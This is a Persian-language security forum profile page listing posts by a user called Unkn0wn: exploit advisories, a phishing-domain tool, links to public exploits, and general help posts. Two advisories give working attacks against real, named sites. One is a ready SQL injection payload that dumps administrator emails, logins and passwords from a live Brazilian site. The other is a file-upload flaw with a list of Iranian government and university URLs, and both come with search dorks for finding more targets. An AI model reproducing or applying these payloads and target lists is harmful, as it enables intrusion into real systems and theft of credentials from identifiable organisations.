رفتن به مطلب
شما به عنوان یوزر میهمان وارد شده اید. جهت استفاده از تمامی امکانات لطقا وارد حساب کاربری خود شوید.

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Unkn0wn

Active Members
  • تعداد ارسال ها

    115
  • تاریخ عضویت

  • آخرین بازدید

اعتبار در سایت

0 Neutral

2 دنبال کننده

درباره Unkn0wn

  • تاریخ تولد ۹۵/۰۷/۰۱

Converted

  • Name
    Unknown
  • Main os
    Mac
  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.

  1. --------------------------------------------------------- # Exploit Title: MD-WEBMARKETING - SQL Injection vulnerability # Google Dork: intext:"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id= # Date: 2020-01-09 # Exploit Author: Unkn0wn # Vendor Homepage: http://mdwebmarketing.com.br/ # Software Link: - # Version: - # Tested on: Ubuntu # CVE : N/A --------------------------------------------------------- Demo: http://www.camaradeodapolis.ms.gov.br/exibe.php?id=117[sql injection] http://amesccg.com.br/beneficios.php?tipo=2[sql injection] http://amesccg.com.br/beneficios.php?tipo=-2+/*!50000Union*/+SeleCt+1,2,3,/*!50000Group_ConCat(email,0x3a,login,0x3a,senha)*/,5,6,7+From+administracao--+ ---------------------------------------------------------- # contact : [email protected] # Visit: https://t.me/l314XK205E # <UndergroundLife/> 2010 - 2020 https://cxsecurity.com/issue/WLB-2020010097
  2. Unkn0wn

    Parscms - Arbitrary File Upload

    ParsCMS - Arbitrary File Upload 2020.01.06 de Unkn0wn (DE) de Risk: High Local: No Remote: Yes CVE: N/A CWE: N/A Dork: "modules/eform/upload/" --------------------------------------------------------- # Exploit Title: ParsCMS - Arbitrary File Upload # Google Dork: N/A # Date: 2020-01-01 # Exploit Author: Unkn0wn ([email protected]) # Vendor Homepage: http://parscms.com/ # Software Link: private cms # Version: 1.0 # Tested on: Ubuntu # CVE : N/A --------------------------------------------------------- exploit: "modules/eform/upload/" demo: http://iauda.ac.ir/modules/eform/upload/ https://www.msc.ir/modules/eform/upload/ http://farhangi.tums.ac.ir/en/modules/eform/upload/ http://old.isipo.ir/modules/eform/upload/ http://eskordi.com/modules/eform/upload/ http://pdiaari.tums.ac.ir/modules/eform/upload/ http://rvp.iauda.ac.ir/modules/eform/upload/ http://www.rca.gov.ir/modules/eform/upload/ http://farhangi.tums.ac.ir/en/modules/eform/upload/ ---------------------------------------------------------- "Happy new Year 2020" # https://Github.com/0x9a
  3. با سلام. در این پست قصد آموزش دستورات خط فرمان ویندوز رو دارم! هر پست شامل یک یا دو دستور با توضیحات هستش لطفا صبور باشید. مبحث گسترده است.
  4. Unkn0wn

    Icsg Homottacker V2.0 - Final

    به نام خدا بابت فعالیت کم عذر خواهی میکنم کم کم چیزایی بیشتر رو منتشر میکنم. در این پست قصد معرفی به ابزار ساده برای انجام Homography Attack استفاده میشه. این نوع حمله برای انجام phishing استفاده میشه که در نوع خودش روش جدیدی هستش و بسیار ازش استفاده میشه که نمونه آن بر روی سایت های paypal - apple انجام شده است از اینجا میتونید راجعبه این حمله بخونید: Read more نکته:برای دریافت کارکتر مورد نظر وارد فولدر نرم افزار بشید و فایل hom.txt پ.ن:تیم ایران سایبر هیچ مسئولیتی در قبال استفاده از این ابزار به عهده ندارد و فقط صرفا جنبه اموزشی دارد. رو باز کنید ویژگی ها: 1- ساخت دامنه با متد homography 2- جستجوی دامنه ساخته شده برای قابلیت ثبت شدن یا نشدن دریافت سورس نرم افزار: https://github.com/0x9a/HomoTTacker فایل اجرایی و فیلم اضافه شد پسورد فایل: iran-cyber.net homoTTackerv2.0.rar
  5. Unkn0wn

    Buffer Overflow And Exploit Developing Training

    دوستان اگر کسی ویدیو مربوط به اموزش XoDiAK رو دارن اپلود کنن ممنون میشم
  6. با سلام تو این پست راجعبه یه آسیب پذیری تو جاوا اسکریپت صحبت کردیم که روی Kibana انجام شده بود حالا اکسپلویت اون پابلیک شده از اینجا میتونید ببینید: https://github.com/LandGrey/CVE-2019-7609
  7. با سلام امروز یک اکسپلویت برای سیستم مدیریت محتوا محبوب جوملا پابلیک شده که سطح این اسیب پذیری بسیار خطرناک هستش بنده چندین سایت حتی سایت ایرانی رو چک کردم و متاسفانه اکثر سایت های ایرانی که تست شده بهش آسیب پذیر هستن این اسیب پذیری به نفوذ گر به راحتی دسترسی از راه دور رو میده و بر روی ورژن های 3.0.0 تا 3.4.6 جواب میده! اکسپلویت رو برای برسی میتونید از گیت هاب زیر مشاهده کنید لینک گیت هاب: Github سو استفاده از اکسپلویت بر عهده خود شماست
  8. Unkn0wn

    دسترسی در شل

    با سلام شما میتونید از باگ جدید لینوکس برای دور زدن سطح دسترسی استفاده کنید شاید جواب بده بهتون چون جدید ترین باگ موجود هستش! و اینکه مشخصه شما دارید از خود شل برای symlink استفاده میکنید و بهتره دستی اقدام کنید مطمعنن جواب میگیرید یه سرچ کوچیک تو سطح نت راجعبه سیملینک بهتون کمک میکنه سوالی هم داشتید اساتید انجمن میتونن بهتون کمک کنن
  9. Unkn0wn

    دسترسی در شل

    شاید پرمیشن یکی از دامن ها ازاد باشه ولی معمولا نیاز به بالاترین سطح دسترسی یعنی روت دارید
  10. به نام خدا حمله‌ی Prototype Pollution در جاواسکریپت هر Objectی در جاواسکریپت یک مشخصه (property) نهان به اسم __proto__ داره. وقتی به مستنداتش: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto مراجعه می‌کنیم اکیدا توصیه شده که دیگه بیخیال این feature در جاواسکریپت شیم و تا الان هم به دلایل سازگاری نیگرش داشتند. کار این مشخصه اینه که در یک کلام دسترسی داشته باشه! (نقش set کننده و get کننده‌ی مشخصه‌ها رو داره!) حتی این مشخصه‌هه به شکلیه که شما می‌تونید یک آبجکت دیگه رو به کل درون یک آبجکت تعریف/تنظیم کنید (اسلاید شماره ۱۰). حالا درون این به‌هم‌ریختگی یه قابلیت دیگه هم وجود داره که شما می‌تونید توی prototype تون مشخصه تعریف کنید! ببینید: obj1.prototype.iscg = true[/b][/center] [b] [center]let obj1 = {} obj1.iscg //true حالا به جایiscg بذارید isAdmin یا هر مشخصه‌ی دیگه‌ای که می‌تونید بهش مقدار دلخواه بدین و در context های مختلف ازش استفاده کنید. به این عمل می‌گن prototype pollution. به همین راحتی. حالا توی این حمله که به Kibana انجام شده یه محقق خلاق اومده یه آبجکت از یه صفحه‌ی دیگه رو که تابع eval رو اجرا می‌کرده دستکاری و آبجکت خودش رو درش تزریق کرده که باعث RCE شده. متن کامل مقاله: https://slides.com/securitymb/prototype-pollution-in-kibana
  11. Unkn0wn

    دوره آموزشی زبان برنامه نویسی C#

    به نام خدا آموزش محیط ویژوال استدیو در این ویدیو که به طور اختصاصی ایران سایبر برای شما دوستان اماده کردم تا حدودی با چیز هایی که نیاز دارید در محیط ویژوال استدیو اموزش داده شده. امیدوارم لذت ببرید Toolbox Nuget Create Project Change Color . . لینک دانلود: Visual Studio Environment پسورد فایل: iran-cyber.net
  12. Unkn0wn

    اموزش کار با Nmap

    با سلام شما زمانی که سرویس دهندتون سرور هاشو جابجا میکنه وظیفه داره ای پی سرور های جدید رو به شما اعلام کنه و شما به راحتی میتونید ای پی سرور رو جایگزین کنید
  13. Unkn0wn

    سلام مشکل در اجرای Vmware

    وقت بخیر. دوست قبلا گفتم خواهش میکنم تو انجمن فینگلیش پست ندین و اینکه شما فعال هم کنید این گزینه رو باز به دردسر که بدترین اون ها کندی سیستم و هنگ کردن سیستم هستش که ممکنه به cpu هم اسیب برسونه .چرا لقمه رو دور سرتون دور بدین بهتر اول کال همون vritualbox نصب کنید خیلی بهتره برا شما
  14. Unkn0wn

    سلام مشکل در اجرای Vmware

    با سلام. لطفا در پست های بعدی از فینگلیش استفاده نکنید. و این که این مشکل به نوع cpu مربوط هستش! بهتر virtualbox رو دانلود کنید چون میگین سیستمتون هم قدیمی هستش virtualbox گزینه بهتری هست تا vmware
  15. به نام خدا با سلام، Bootroom یا SecureROM روی دستگاه‌های شرکت اپل، اولین کد مهمیه که روی هر کدومشون اجرا می‌شه. Bootroom فقط خواندنیه و پیدا شدن آسیب‌پذیری روش انقدر مهم و بحرانیه که اپل هیچوقت نمی‌تونه اونو پچ کنه. تنها راهش جایگزین شدن سخت‌افزاره! اکسپلویتی که امروز منتشر شد از Bootroom آیفون 4S تا آیفون 8 رو در بر می‌گیره! آسیب‌پذیری این Bootroomها از نوع Race Condition هست و اکسپلویتی که منتشر شده بخاطر جنبه‌ی حیاتی‌ای که داره، ترجیح داده شده که Full Jailbreak نباشه. ولی این امکان برای محقق وجود داره که SecureRom رو دامپ کنه، رمزنگاری فایل سیستم اپل (keybag)‌ رو رمزگشایی کنه و در نهایت امکان بهره‌گیری از JTAG رو روی دستگاه به قصد دسترسی مستقیم به حافظه دستگاه (DMA)‌ فراهم کنه. این بنده‌ی خدایی که این آسیب‌پذیری رو کشف کرده میگه موقعی که اپل نسخه‌ی بتا iOS ۱۲ رو ریلیز کرده، یه آسیب‌پذیری UAF روی کد iBoot USB رو پچ کرده که از راه دور قابل اکسپلویت نبوده و نیاز به دسترسی فیزیکی به دستگاه داشته. اینطوری بوده که با تحلیل اون، این آسیب‌پذیری کشف شده. آخرین اکسپلویتی که از Bootroom تاحالا کشف شده مربوط به iPhone 4 به قبل بوده! حالا با این اکسپلویت متاسفانه همه به راحتی می‌تونن هر دستگاه آیفونی رو Jailbreak کنن. هکرها، پلیس‌ها، دزدها، دولت‌ها و... هم می‌تونن با این اکسپلویت گوشی شما رو Jailbreak و تمام اطلاعاتتون رو در اختیار داشته باشند. می‌تونید از این لینک به این اکسپلویت دسترسی داشته باشید. Github: (https://github.com/axi0mX/ipwndfu) منبع:آفسک

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...